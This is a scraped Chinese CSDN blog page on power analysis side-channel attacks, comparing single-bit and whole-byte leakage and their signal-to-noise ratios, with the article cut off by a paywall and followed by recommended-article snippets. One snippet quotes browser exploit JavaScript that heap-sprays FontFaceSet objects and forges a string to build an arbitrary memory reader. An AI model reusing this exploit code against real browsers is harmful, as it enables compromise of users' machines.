能量分析攻击_能量迹单bit泄露和整个byte泄露比较

最新推荐文章于 2022-09-17 14:51:10 发布
最新推荐文章于 2022-09-17 14:51:10 发布
阅读量1.6k 收藏
点赞数
分类专栏: 密码学 文章标签: 能量分析攻击 DPA 密码学 旁道攻击 side-channel attack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxzxzxzx2121/article/details/42677467
版权
能量分析攻击中,攻击单个bit涉及的运算单元为byte,导致转换噪声影响信噪比。整个byte的能量泄露信噪比更高,分析效果更精确。参考Mangard等人的研究,单点泄露信噪比远低于字节级泄露。
摘要由CSDN通过智能技术生成

在能量分析攻击中,可以选择攻击整个byte或者某个单一的bit。

但是,在芯片中通常是以byte的形式进行运算和存储,因此即使攻击目标为单一bit,其所涉及的运算单元仍然会是byte。这样,一个byte中的其他7个bit都成为了转换噪声,因为这7个bit也会参与运算从而出现在采集到的能量迹中。我们把这个转换噪声称为P(sw.noise),有用信息部分P(exp),操作消耗能量P(op),数据产生的能量P(data),则有:

P(op)+P(data)=P(exp)+P(sw.noise)

对于整个能量迹,总能量消耗

P(total)=P(exp)+P(sw.noise)+P(el.noise)+P(const),其中P(el.noise)为电子噪声,也就是电子器件在工作中产生的噪声,P(const)为工作中的一些固定能量消耗,为定值。

那么这个过程的信噪比,用方差来衡量,表示为:

SNR=Var(signal) / Var(noise) = Var(P(exp)) / Var(P(sw.noise)+P(el.noise))

信噪比

最低0.47元/天 解锁文章
GluttonousZX
关注
专栏目录
内存泄露好工具--valgrind的使用
啊渊的专栏
06-02 1088
valgrind 是一个提供了一些 debug 和优化的工具的工具箱,可以使得你的程序减少内存泄漏或者错误访问. valgrind 默认使用 memcheck 去检查内存问题.memcheck 检测内存问题的原理如下图所示:Memcheck 能够检测出内存问题,关键在于其建立了两个全局表。valid-value map: 对于进程的整个地址空间中的每一个字节(byte),都有与之对应的 8 个 bits;对于 CPU 的每个寄存器,也有一个与之对应的 bit 向量。这些 bits 负责记录该字节或者寄存器值
PostgreSQL的学习心得和知识总结(一百三十五)|深入理解PostgreSQL数据库之查找 PostgreSQL C 代码中的内存泄漏
最新发布
孤傲小二~阿沐的博客
04-02 1224
PostgreSQL数据库之查找 PostgreSQL C 代码中的内存泄漏
能量分析攻击(不是同名书籍,是能量分析攻击相关文章)
09-11
简述侧信道攻击思想,重点介绍能量分析攻击原理及方法,并给出一个实例。
能耗分析攻击
monica_ysl的博客
09-17 1247
能耗分析攻击分为SPA,DPA。文章介绍了能耗分析攻击原理,以及攻击的实例。
能量分析攻击Day5
weixin_43709767的博客
08-14 724
第五章简单能量分析 5.1概述 1.SPA攻击利用能量迹中依赖于密钥的变化(或称为模式)​,它仅需要使用一条或很少量的能量迹。 5.2能量迹直观分析 5.2.1软件实现的能量迹直观分析示例 5.3模板攻击 1.能量消耗同样依赖于设备正在处理的数据 5.3.1概述 1.模板h是由一个均值向量m和一个协方差矩阵C构成的数据对 5.3.2模板构建 1.特征点是指包含关于所刻画指令最多信息的点 2.数据和密钥对模板构建 中间值模板构建 基于能量模型的模板构建 5.3.3模板匹配 1.产生最高概率的模板能够揭示出正
能量分析攻击Day1
weixin_43709767的博客
08-08 882
一、引言 1密码学与密码设备 1.​密码设备是能够实现密码算法并储存密钥的电子设备 智能卡,封闭计算平台 USB令牌 2.密码设备的安全性不应依赖于实现的保密性 2密码设备攻击 1.分类原则1,主动或被动 原则2,利用的"接口"​ 2.​入侵式攻击KK99 And01 Sko05 3.​半入侵式Sko05,不电子接触芯片表面,被动SSAQ02 主动SA03 4.非入侵式攻击 计时 能量 电磁 3能量分析攻击 密码设备的瞬时能量消耗依赖于设备所处理的数据和设备所执行的操作 8051兼
能量分析攻击day01
qq_40739219的博客
09-12 788
引言 1.1密码学与密码设备 密码设备是能够实现密码算法并存储秘钥的电子设备 密码设备的安全性不应依赖于实现的保密性 1.2密码设备攻击 被动攻击:被动攻击中,密码设备大多数情况下都会按照其规范运行,甚至可能会完全按照其规范运行。这种情况下,通过观测密码设备的物理特性(执行时间、能量消耗),攻击者就可以获得密钥。 主动攻击:主动攻击中,为了使得密码设备的运行行为出现异常,攻击者常会对密码设备、其输入环境进行巧妙的控制,在这种情况下,通过分析设备的异常行为,攻击者就...
java内存泄露direct_Java内存模型和内存泄漏实战(一)
weixin_32392989的博客
02-25 256
java虚拟机在执行java程序过程中会把它所管理的内存划分为不同的数据区域。有的区域随着虚拟机进程的启动而存在,有些区域则依赖用户线程的启动和结束而简历和销毁。上图的java运行时数据区,大体分为线程私有区和线程共享区线程私有区程序计数器:一块较小的内存空间,可以看做是当前线程所执行的字节码的行号指示器。字节码解释器工作的时候就是通过改变这个计数器的值来选取下一条需要执行的字节码的指令,分支、循...
ffmpeg 编码 apng 解决内存泄露问题
c553110519的专栏
05-26 1908
ffmpeg 编码 apng 解决内存泄露问题 1.通过之前写的文章可以很容易进行apng的编码,但是通过使用memcheck内存检测,发现编码多张png图片造成了严重的内存泄露问题 chenglong@chenglong-virtual-machine:~/work/ffmpeg$ valgrind --tool=memcheck --leak-check=full --show-r
差分能量分析攻击原理及其抵御措施的探讨
12-13
摘要:介绍了建立在执行密码运算的芯片的能量消耗基础上的攻击方式,这些攻击方式中差分能量分析攻击是最难被避免的。介绍了差分能量分析的原理以及防御这种类型攻击的主要思想。      关键词:能量消耗 差分能量分析 防御 1 差分能量分析 许多信用卡公司计划在未来几年内部大部分的磁卡转变为智能卡。目前智能卡在运输、电子货币、ID卡等领域内的用途不断增加。智能卡的主要优势是内部数据例如密钥能够在内部处理而仅仅公开处理结果。但是,在使用输入信息和密钥所进行的处理过程中智能卡会产生诸如能量消耗或者电磁散射之类的信息泄漏。于是近年来出现了一些新的攻击手段,攻击者有可能利用它们获取保存在智能卡内部的数
chipwhisperer:ChipWhisperer-完整的开源工具链,用于侧通道功率分析和小故障攻击
02-05
ChipWhisperer | | | | | ChipWhisperer是致力于硬件安全研究的开源工具链。 该工具链由几层开源组件组成: 硬件:ChipWhisperer使用捕获板和目标板。 可免费获得ChipWhisperer-Lite捕获板的原理图和PCB布局以及许多目标板。 固件:ChipWhisperer硬件上使用了三个单独的固件。 捕获板具有一个USB控制器(在C中)和一个FPGA,用于使用开源固件进行高速捕获(在Verilog中)。 此外,目标设备具有自己的固件; 该存储库包含针对不同目标的许多固件示例。 软件:ChipWhisperer软件由用于控制硬件的捕获程序和
cwl-projects:享受ChipWhisperer-Lite的乐趣
05-14
cwl-项目 享受ChipWhisperer-Lite的乐趣
能量分析攻击Day2
weixin_43709767的博客
08-14 201
第二章 密码设备 2.1组成部件 1.专用密码硬件 通用硬件 密码软件 储存器 接口 2.单芯片 多芯片 2.2设计与实现 1.数字电路–>专用集成电路ASIC 可编程门阵列FGPA 2.2.1设计步骤 规范制定(文档、编程语言) 行为设计(寄存器传输层的数字电路描述) 结构设计(网表) 物理设计(布局布线) 2.2.2半定制化设计 1.半制定化设计流程中,大多数从行为级到结构级的设计转换工作,乃至进一步到物理级的设计转换工作都是自动完成的,这一转换过程称为"综合" 2.高层设计捕获 设计综合 布局规划
能量分析攻击Day4
weixin_43709767的博客
08-14 643
第4章能量迹的统计特征 4.1能量迹的组成 1.能量迹上的每一点可以刻画为操作依赖分量Pop,数据依赖分量Pdata,电子噪声Pel.noise以及恒定分量Pconst的和。 4.2能量迹单点特征 4.2.1电子噪声 1.电子噪声Pel.noise服从正态分布:Pel.noise~N(0,δ) 4.2.2数据依赖性 1.微控制器能量消耗的Pdata分量基本上与微控制器正在处理数据的汉明重量成反比 2.对于绝大多数密码设备而言,如果被处理的数据服从均匀分布,则可以用正态分布来近似设备能量消耗中的数据依赖分量P
能量分析攻击Day3
weixin_43709767的博客
08-14 840
3 能量消耗 3.1CMOS电路的能量消耗 1.总能量消耗依赖于电路中逻辑元件的数量,连接方式及其具体构造 2.两部分,静态能量消耗,动态能量消耗 3.1.1静态能量消耗 CMOS电路的静态能量消耗一般非常低,然而,现代半导体加工工艺所使用的结构规模很小,在这种情况下,电路的静态能量消耗会急剧增加。 3.1.2动态能量消耗 1.典型的CMOS电路中,动态能量消耗是总能量消耗的主导因素,动态能量消耗依赖于CMOS电路所处理的数据 2.充电电流 3.短路电流 4.动态能量消耗仿真 3.1.3毛刺 CMOS电路中
能量分析攻击day02
qq_40739219的博客
09-12 548
1.4能量分析攻击防御对策 两大类:隐藏技术,掩码技术 隐藏技术的基本思想是消除能量消耗的数据依赖性。 第二章 密码设备 2.1组成部件 专用密码硬件:该类部件包括所有专用于密码操作的硬件(如实现aes的专用密码电路) 通用硬件:该类部件包括所有用于完成密码操作的通用硬件(如通过编程控制完成aes加密的为微控制器) 密码软件:实现密码操作的任意软件(如实现aes的软件) 储存器:存储密码操作的数据(如aes加密密钥) 接口:该类部件处理密码设备发送和接收的数据。密码应用对接口有特殊的要求(
能量迹的统计特征学习报告
m0_56121728的博客
12-19 901
一、能量迹的概念: 能量迹是用数字示波器采样的电压值向量,测量到的电压值与密码设备的能量消耗成正比、数字示波器的配置决定了能量迹的长度以及每秒钟记录的点数 。 二、能量迹的组成: 首先,能量分析攻击利用的是密码设备的执行操作和处理数据与能量消耗 的依赖关系来分析利用。 我们所关注的依赖关系有两种: ①操作依赖(控制加减乘除的变化来分析) ②数据依赖(控制输入的数据进行) 对于能迹中的每一个点,将其中的操作依赖分量记为P(op),数据依赖分量记为P(date)。并且在实际测量中还包含了,电子噪声
CPA相关功耗分析(一)
qq_40739219的博客
12-11 2967
1.相关性分析方法简介 相关性分析方法:针对部分或者全部密钥位参与密码运算的过程中,根据能量信号与密码运算计算过程中产生的中间数据的汉明重量或者汉明距离的相关性,计算猜测密钥得到的中间结果汉明重量或者汉明距离与实测能量信号之间的线性相关性,来恢复密钥。 1.1补充知识 汉明距离 : 是一个概念,表示两个等长的字符串对应位不同的个数,对两个字符串进行异或运算,并统计其结果为1的个数就是汉明距离。(因为侧信道底层都是0和1的变换,所以此处只用二进制举例) 汉明重量 : 它是一种特殊...
var needfix = []; for (var i = 0;; i++) { ffses["ffs_leak_" + i] = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font + 1], good_font]); var badstr2 = mkString(HASHMAP_BUCKET, p_s); needfix.push(mkString(HASHMAP_BUCKET, p_s)); bad_fonts[guessed_font].family = "evil2"; bad_fonts[guessed_font + 1].family = "evil3"; var leak = stringToPtr(badstr2.substr(badstr2.length - 8)); if (leak < 0x1000000000000) break; } function makeReader(read_addr, ffs_name) { var fake_s = ''; fake_s += '0000'; //padding for 8-byte alignment fake_s += '\u00ff\u0000\u0000\u0000\u00ff\u00ff\u00ff\u00ff'; //refcount=255, length=0xffffffff fake_s += ptrToString(read_addr); //where to read from fake_s += ptrToString(0x80000014); //some fake non-zero hash, atom, 8-bit p_s = ''; p_s += ptrToString(29); p_s += ptrToString(guessed_addr); p_s += ptrToString(guessed_addr + SIZEOF_CSS_FONT_FACE); p_s += ptrToString(guessed_addr + 2 * SIZEOF_CSS_FONT_FACE); for (var i = 0; i < 18; i++) p_s += ptrToString(INVALID_POINTER); for (var i = 0; i < 256; i++) mkString(HASHMAP_BUCKET, p_s); var the_ffs = ffses[ffs_name] = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font + 1], bad_fonts[guessed_font + 2], good_font]); mkString(HASHMAP_BUCKET, p_s); var relative_read = mkString(HASHMAP_BUCKET, fake_s); bad_fonts[guessed_font].family = ffs_name + "_evil1"; bad_fonts[guessed_font + 1].family = ffs_name + "_evil2"; bad_fonts[guessed_font + 2].family = ffs_name + "_evil3"; needfix.push(relative_read); if (relative_read.length < 1000) //failed return makeReader(read_addr, ffs_name + '_'); return relative_read; }继续解释以上代码?
07-20
这段代码是继续在之前的攻击基础上进行漏洞利用的部分。 首先,代码定义了一个名为`needfix`的空数组。 然后,代码进入一个无限循环,循环体内进行以下操作: 首先,创建了一个新的`FontFaceSet`对象,并将之前...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值